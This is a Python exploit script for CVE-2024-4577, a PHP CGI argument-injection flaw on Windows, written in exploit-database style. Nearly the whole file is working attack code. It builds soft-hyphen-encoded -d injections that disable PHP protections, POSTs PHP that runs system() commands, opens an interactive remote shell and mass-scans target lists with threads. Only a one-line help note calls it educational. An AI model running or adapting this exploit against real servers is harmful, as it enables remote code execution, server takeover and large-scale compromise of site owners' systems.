#!/usr/bin/env python3
# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
# Date: 2025-06-13
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/yigitsql ( old account banned )
# Vendor Homepage: https://www.php.net/
# Software Link: https://www.php.net/downloads
# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-4577
# Description:
# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute
# arbitrary code through command injection. The vulnerability exists due to improper handling
# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions
# and execute arbitrary commands with the privileges of the web server. This vulnerability
# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27.
#
# Impact:
# - Remote Code Execution (RCE)
# - Information Disclosure
# - Server Compromise
#
# References:
# - https://nvd.nist.gov/vuln/detail/cve-2024-4577
# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure
# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/
# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577
# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
#
# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures
import re
import sys
import base64
import requests
import argparse
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed
disable_warnings(InsecureRequestWarning)
console = Console()
class PHPCGIExploit:
"""CVE-2024-4577 PHP CGI Argument Injection RCE Exploit"""
def __init__(self):
self.headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}
# Optimized settings for PHP CGI argument injection
self.php_settings = [
"-d cgi.force_redirect=0",
"-d cgi.redirect_status_env=0",
"-d fastcgi.impersonate=1",
"-d open_basedir=",
"-d disable_functions=",
"-d auto_prepend_file=php://input",
"-d allow_url_include=1",
"-d allow_url_fopen=1"
]
# Soft hyphen character for Windows systems
self.soft_hyphen = "%AD" # 0xAD character
# Different PHP CGI paths to try
self.cgi_paths = [
"/php-cgi/php-cgi.exe",
"/php/php-cgi.exe",
"/cgi-bin/php-cgi.exe",
"/php-cgi.exe",
"/php.exe",
"/php/php.exe"
]
def ascii_art(self):
print("")
console.print("[bold red] ____ _ _ ____ ____ ____ ___[/bold red]")
console.print("[bold red] | _ \| | | | _ \ / ___|/ ___|_ _|[/bold red]")
console.print("[bold red] | |_) | |_| | |_) | | | | | _ | |[/bold red]")
console.print("[bold red] | __/| _ | __/ | |___| |_| || |[/bold red]")
console.print("[bold red] |_| |_| |_|_| \____|\____|___|[/bold red]")
console.print("[bold yellow] CVE-2024-4577 Exploit[/bold yellow]")
console.print("[dim white] PHP CGI Argument Injection[/dim white]")
console.print("[dim cyan] Developer: @ibrahimsql[/dim cyan]")
print("")
def build_payload_url(self, cgi_path):
# Argument injection with soft hyphen
settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen)
settings_str = settings_str.replace("=", "%3D").replace(" ", "+")
return f"{cgi_path}?{settings_str}"
def execute_command(self, target, command="whoami", cgi_path=None):
"""Execute command on target using PHP CGI argument injection"""
try:
# Create PHP code
php_code = f"""<?php
error_reporting(0);
echo '[START]';
system('{command}');
echo '[END]';
die();
?>"""
# If no CGI path specified, try all paths
if cgi_path:
paths_to_try = [cgi_path]
else:
paths_to_try = self.cgi_paths
for path in paths_to_try:
try:
payload_url = self.build_payload_url(path)
full_url = f"{target.rstrip('/')}{payload_url}"
response = requests.post(
full_url,
headers=self.headers,
data=php_code,
timeout=10,
verify=False,
allow_redirects=False
)
# Check output
if response.status_code == 200:
output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL)
if output_match:
return output_match.group(1).strip(), path
except requests.exceptions.RequestException:
continue
return None, None
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
return None, None
def check_vulnerability(self, target):
"""Check if target is vulnerable"""
console.print(f"[blue][*][/blue] Testing target: {target}")
# Test with a simple command
result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
if result and "CVE-2024-4577-TEST" in result:
console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}")
# Get system information
sys_info, _ = self.execute_command(target, "systeminfo", cgi_path)
if sys_info:
console.print("[green][+][/green] System Information:")
console.print(f"[dim]{sys_info[:500]}...[/dim]") # First 500 characters
return True, cgi_path
else:
console.print(f"[red][-][/red] Target is not vulnerable")
return False, None
def interactive_shell(self, target, cgi_path):
"""Interactive shell session - Simple version"""
console.print("[green][+][/green] Interactive shell opened")
console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen")
while True:
try:
# Simple input prompt
cmd = input("shell> ")
if cmd.lower() == "exit":
break
elif cmd.lower() == "clear":
print("\033[2J\033[H", end="")
continue
elif cmd.strip() == "":
continue
# Execute command
result, _ = self.execute_command(target, cmd, cgi_path)
if result:
print(result)
else:
console.print("[red][-][/red] Command execution failed")
except KeyboardInterrupt:
console.print("\n[yellow][!][/yellow] Use 'exit' to quit")
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
def exploit_target(self, target, output_file=None):
"""Exploit single target"""
is_vulnerable, cgi_path = self.check_vulnerability(target)
if is_vulnerable:
# Save results
if output_file:
with open(output_file, "a") as f:
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
# Start interactive shell
console.print("[blue][*][/blue] Starting interactive shell...")
self.interactive_shell(target, cgi_path)
else:
if output_file:
with open(output_file, "a") as f:
f.write(f"[-] Not vulnerable: {target}\n")
def scan_multiple_targets(self, targets_file, threads=5, output_file=None):
"""Scan multiple targets"""
try:
with open(targets_file, "r") as f:
targets = [line.strip() for line in f if line.strip()]
if not targets:
console.print("[red][-][/red] No targets found in file")
return
console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads")
vulnerable_targets = []
def scan_target(target):
try:
is_vulnerable, cgi_path = self.check_vulnerability(target)
if is_vulnerable:
vulnerable_targets.append((target, cgi_path))
if output_file:
with open(output_file, "a") as f:
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
except Exception as e:
console.print(f"[red][-][/red] Error scanning {target}: {str(e)}")
with alive_bar(len(targets), title="Scanning", bar="smooth") as bar:
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(scan_target, target) for target in targets]
for future in as_completed(futures):
future.result()
bar()
# Summary
print("")
console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets")
if vulnerable_targets:
console.print("\n[bold]Vulnerable Targets:[/bold]")
for target, cgi_path in vulnerable_targets:
console.print(f" [green]•[/green] {target} (CGI: {cgi_path})")
except FileNotFoundError:
console.print(f"[red][-][/red] File not found: {targets_file}")
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
def main():
"""Main function"""
exploit = PHPCGIExploit()
exploit.ascii_art()
parser = argparse.ArgumentParser(
description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt -t 10 -o results.txt
Note: This tool is for educational and authorized testing purposes only.
"""
)
parser.add_argument("-u", "--url", help="Single target URL")
parser.add_argument("-f", "--file", help="File containing target URLs")
parser.add_argument("-o", "--output", help="Output file for results")
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)")
args = parser.parse_args()
if args.url:
exploit.exploit_target(args.url, args.output)
elif args.file:
exploit.scan_multiple_targets(args.file, args.threads, args.output)
else:
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
main()
